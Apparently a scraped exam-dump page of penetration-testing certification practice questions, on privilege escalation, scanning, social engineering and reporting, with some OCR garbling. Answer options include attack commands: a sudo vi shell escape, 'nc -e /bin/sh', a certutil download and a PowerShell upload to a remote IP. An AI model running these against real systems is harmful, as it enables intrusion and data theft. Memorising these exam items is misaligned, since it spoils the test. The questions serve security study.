User www-data may run the following commands on serverl2: (root) NOPASSWD: /usr/bin/vi

Which of the following is the fastest way to escalate privileges on this server?

A.

Editing the file /etc/passwd to add a new user with uid0

B.

Creating a Bash script, saving it on the /tmp folder, andthen running it

C.

Executing the command sudo vi -c ' Jbash'

D.

Editing the file/etc/sudoers to allow any command

Full Access
Question # 105

Which of the following tools would be the best to use to intercept an HTTP response of an API, change its content, and forward it back to the origin mobile device?

A.

Drozer

B.

Burp Suite

C.

Android SDK Tools

D.

MobSF

Full Access
Question # 106

A penetration tester approaches a company employee in the smoking area and starts a conversation about the company's recent social event. After a few minutes, the employee holds the badge-protected door open for the penetration tester and both enter the company's building. Which of the following attacks did the penetration tester perform?

A.

Dumpster diving

B.

Phishing

C.

Badge cloning

D.

Tailgating

Full Access
Question # 107

A penetration tester is performing an assessment for an application that is used by large organizations operating in the heavily regulated financial services industry. The penetration tester observes that the default Admin User account is enabled and appears to be used several times a day by unfamiliar IP addresses. Which of the following is the most appropriate way to remediate this issue?

A.

Increase password complexity.

B.

Implement system hardening.

C.

Restrict simultaneous user log-ins.

D.

Require local network access.

Full Access
Question # 108

A penetration tester is trying to bypass an active response tool that blocks IP addresses that have more than 100 connections per minute. Which of the following commands would allow the tester to finish the test without being blocked?

A.

nmap -sU -p 1-1024 10.0.0.15

B.

nmap -p 22,25, 80, 3389 -T2 10.0.0.15 -Pn

C.

nmap -T5 -p 1-65535 -A 10.0.0.15

D.

nmap -T3 -F 10.0.0.15

Full Access
Question # 109

A penetration tester is looking for a particular type of service and obtains the output below:

I Target is synchronized with 127.127.38.0 (reference clock)

I Alternative Target Interfaces:

I 10.17.4.20

I Private Servers (0)

I Public Servers (0)

I Private Peers (0)

I Public Peers (0)

I Private Clients (2)

I 10.20.8.69 169.254.138.63

I Public Clients (597)

I 4.79.17.248 68.70.72.194 74.247.37.194 99.190.119.152

I 12.10.160.20 68.80.36.133 75.1.39.42 108.7.58.118

I 68.56.205.98

I 2001:1400:0:0:0:0:0:1 2001:16d8:ddOO:38:0:0:0:2

I 2002:db5a:bccd:l:21d:e0ff:feb7:b96f 2002:b6ef:81c4:0:0:1145:59c5:3682

I Other Associations (1)

|_ 127.0.0.1 seen 1949869 times, last tx was unicast v2 mode 7

Which of the following commands was executed by the tester?

A.

nmap-sU-pU:517-Pn-n—script=supermicro-ipmi-config

B.

nmap-sU-pU:123-Pn-n—script=ntp-monlist

C.

nmap-sU-pU:161-Pn-n—script«voldemort-info

D.

nmap-sU-pU:37 -Pn -n —script=icap-info

Full Access
Question # 110

A penetration tester is performing reconnaissance for a web application assessment. Upon investigation, the tester reviews the robots.txt file for items of interest.

INSTRUCTIONS

Select the tool the penetration tester should use for further investigation.

Select the two entries in the robots.txt file that the penetration tester should recommend for removal.

Full Access
Question # 111

A penetration tester developed the following script to be used during an engagement:

#!/usr/bin/python

import socket, sys

ports = [21, 22, 23, 25, 80, 139, 443, 445, 3306, 3389]

if len(sys.argv) > 1:

target = socket.gethostbyname (sys. argv [0])

else:

print ("Few arguments.")

print ("Syntax: python {} ". format (sys. argv [0]))

sys.exit ()

try:

for port in ports:

s = socket. socket (socket. AF_INET, socket. SOCK_STREAM)

s.settimeout (2)

result = s.connect_ex ((target, port) )

if result == 0:

print ("Port {} is opened". format (port) )

except KeyboardInterrupt:

print ("\nExiting ... ")

sys.exit ()

However, when the penetration tester ran the script, the tester received the following message:

socket.gaierror: [Errno -2] Name or service not known

Which of the following changes should the penetration tester implement to fix the script?

A.

From:

target = socket.gethostbyname (sys. argv [0])

To:

target = socket.gethostbyname (sys.argv[1])

B.

From:

s = socket. socket (socket. AF_INET, socket. SOCK_STREAM)

To:

s = socket.socket (socket.AF_INET, socket. SOCK_DGRAM)

C.

From:

import socket, sys

To:

import socket

import sys

D.

From:

result = s.connect_ex ((target, port) )

To:

result = s.connect ( (target, port) )

Full Access
Question # 112

A client asks a penetration tester to retest its network a week after the scheduled maintenance window. Which of the following is the client attempting to do?

A.

Determine if the tester was proficient.

B.

Test a new non-public-facing server for vulnerabilities.

C.

Determine if the initial report is complete.

D.

Test the efficacy of the remediation effort.

Full Access
Question # 113

Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

A.

Whether the cloud service provider allows the penetration tester to test the environment

B.

Whether the specific cloud services are being used by the application

C.

The geographical location where the cloud services are running

D.

Whether the country where the cloud service is based has any impeding laws

Full Access
Question # 114

A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:

    Have a full TCP connection

    Send a “hello” payload

    Walt for a response

    Send a string of characters longer than 16 bytes

Which of the following approaches would BEST support the objective?

A.

Run nmap –Pn –sV –script vuln .

B.

Employ an OpenVAS simple scan against the TCP port of the host.

C.

Create a script in the Lua language and use it with NSE.

D.

Perform a credentialed scan with Nessus.

Full Access
Question # 115

A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.

Which of the following is the BEST action for the penetration tester to take?

A.

Utilize the tunnel as a means of pivoting to other internal devices.

B.

Disregard the IP range, as it is out of scope.

C.

Stop the assessment and inform the emergency contact.

D.

Scan the IP range for additional systems to exploit.

Full Access
Question # 116

A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

A.

Create a one-shot system service to establish a reverse shell.

B.

Obtain /etc/shadow and brute force the root password.

C.

Run the nc -e /bin/sh <...> command.

D.

Move laterally to create a user account on LDAP

Full Access
Question # 117

A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

A.

Aircrack-ng

B.

Wireshark

C.

Wifite

D.

Kismet

Full Access
Question # 118

A penetration tester conducts an Nmap scan against a target and receives the following results:

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

A.

Nessus

B.

ProxyChains

C.

OWASPZAP

D.

Empire

Full Access
Question # 119

Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?

A.

Executive summary of the penetration-testing methods used

B.

Bill of materials including supplies, subcontracts, and costs incurred during assessment

C.

Quantitative impact assessments given a successful software compromise

D.

Code context for instances of unsafe type-casting operations

Full Access
Question # 120

A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables.

Which of the following should be included as a recommendation in the remediation report?

A.

Stronger algorithmic requirements

B.

Access controls on the server

C.

Encryption on the user passwords

D.

A patch management program

Full Access
Question # 121

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

A.

certutil –urlcache –split –f http://192.168.2.124/windows-binaries/ accesschk64.exe

B.

powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’)

C.

schtasks /query /fo LIST /v | find /I “Next Run Time:”

Full Access
Question # 122

A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

A.

Nmap

B.

tcpdump

C.

Scapy

D.

hping3

Full Access
Question # 123

A penetration tester is assessing a wireless network. Although monitoring the correct channel and SSID, the tester is unable to capture a handshake between the clients and the AP. Which of the following attacks is the MOST effective to allow the penetration tester to capture a handshake?

A.

Key reinstallation

B.

Deauthentication

C.

Evil twin

D.

Replay

Full Access
Question # 124

A penetration tester conducted a discovery scan that generated the following:

Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?

A.

nmap –oG list.txt 192.168.0.1-254 , sort

B.

nmap –sn 192.168.0.1-254 , grep “Nmap scan” | awk ‘{print S5}’

C.

nmap –-open 192.168.0.1-254, uniq

D.

nmap –o 192.168.0.1-254, cut –f 2

Full Access
Question # 125

You are a security analyst tasked with hardening a web server.

You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTIONS

Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Full Access
Question # 126

A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company’s employees.

Which of the following tools can help the tester achieve this goal?

A.

Metasploit

B.

Hydra

C.

SET

D.

WPScan

Full Access
Question # 127

A compliance-based penetration test is primarily concerned with:

A.

obtaining Pll from the protected network.

B.

bypassing protection on edge devices.

C.

determining the efficacy of a specific set of security standards.

D.

obtaining specific information from the protected network.

Full Access
Question # 128

A penetration tester needs to access a building that is guarded by locked gates, a security team, and cameras. Which of the following is a technique the tester can use to gain access to the IT framework without being detected?

A.

Pick a lock.

B.

Disable the cameras remotely.

C.

Impersonate a package delivery worker.

D.

Send a phishing email.

Full Access
Question # 129

A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

A.

Wait for the next login and perform a downgrade attack on the server.

B.

Capture traffic using Wireshark.

C.

Perform a brute-force attack over the server.

D.

Use an FTP exploit against the server.

Full Access